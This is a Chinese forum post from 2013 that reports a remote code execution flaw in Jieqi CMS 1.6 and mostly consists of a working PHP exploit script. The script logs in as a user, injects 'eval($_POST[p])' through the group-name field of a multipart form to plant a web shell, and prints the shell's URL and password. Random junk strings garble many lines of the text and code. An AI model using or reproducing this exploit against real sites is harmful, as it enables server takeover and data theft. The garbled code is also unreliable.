杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
) s% d0 j$ I0 b: _& n9 z0 T% D4 e* i2 B5 L! O
' i7 q2 @- ~! W* N$ u
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
$ r4 Q2 Z; N* R0 u9 i% `1 O 需要有一个能创建圈子的用户。
* w- @" C7 m; B% _) M* J2 l
0 X4 M4 q% [: h9 P& g1 J<?php
$ v$ }8 L1 {& M. X# [0 a' V 8 r- k. f' {% p$ y, i8 W& z
print_r(', Y! B3 O; p6 p, N3 ?( l' z
+---------------------------------------------------------------------------+
' a1 T s8 R3 S% Y8 a: g8 ^ UJieqi CMS V1.6 PHP Code Injection Exploit0 D" R2 `# v) ~) @% G+ s
by flyh4t! V& C. i. | h! h
mail: phpsec at hotmail dot com; G7 j9 E1 K8 S
team: http://www.wolvez.org
6 @" _# S/ [3 M6 e+---------------------------------------------------------------------------+
( o7 l3 F! E6 o/ a6 f'); /**; V/ L- Y! F, _0 f: z2 S8 D o
* works regardless of php.ini settings+ w' M8 @4 N. f& F& R9 e
*/ if ($argc < 5) { print_r('
: i6 q6 X9 E5 \7 _+---------------------------------------------------------------------------+( A! `- @. m7 [' ]6 d$ B c& i
Usage: php '.$argv[0].' host path username7 u) A2 q4 q$ x9 M9 s
host: target server (ip/hostname)8 k7 W6 o' x6 e" G: s. t/ x1 t
path: path to jieqicms $ Q( F" g: [0 x( m1 ~/ t) m
uasename: a username who can create group( G- Q* F- p, d+ O P W
Example:4 B& E3 D8 ~% R% ^. L+ B
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password. B! a& ~" N' I; o' i5 q
+---------------------------------------------------------------------------+
7 P* w& p2 r/ t) ]'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
9 z; v5 t* W& |4 E2 b6 a2 _Content-Disposition: form-data; name="gname", h, n+ X% ?% V% n0 Y
9 f2 H1 @ d( c0 k% V% c
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t. D* t8 v7 L' r0 t6 E) E
-----------------------------23281168279961- A1 _' | C) ? L q
Content-Disposition: form-data; name="gcatid"
, E! n& A8 p5 s. |4 n( R
- u+ a- e2 |& s! X8 e( w& ?1
* ` S; [4 H# q3 S/ ~8 i-----------------------------23281168279961
2 A8 C9 L; l t" eContent-Disposition: form-data; name="gaudit"
) X2 ^" K `# ]# z0 D' a
5 N5 d; ^" n3 Z- O1
' `* S' G4 L% _ I1 H-----------------------------23281168279961
( ]. ~3 ]/ K1 NContent-Disposition: form-data; name="gbrief"
+ y" N) y/ G8 Y% L 7 j8 v) l1 \* c! Y# t; b+ U, Q% M
1
5 @2 ^6 ]( F8 q" s( o6 i-----------------------------23281168279961--% [* F' ?$ j6 m+ }( t* e% K
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
* W4 G! o3 i3 U! F1 p A# i # T" i9 n% z% r$ g
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对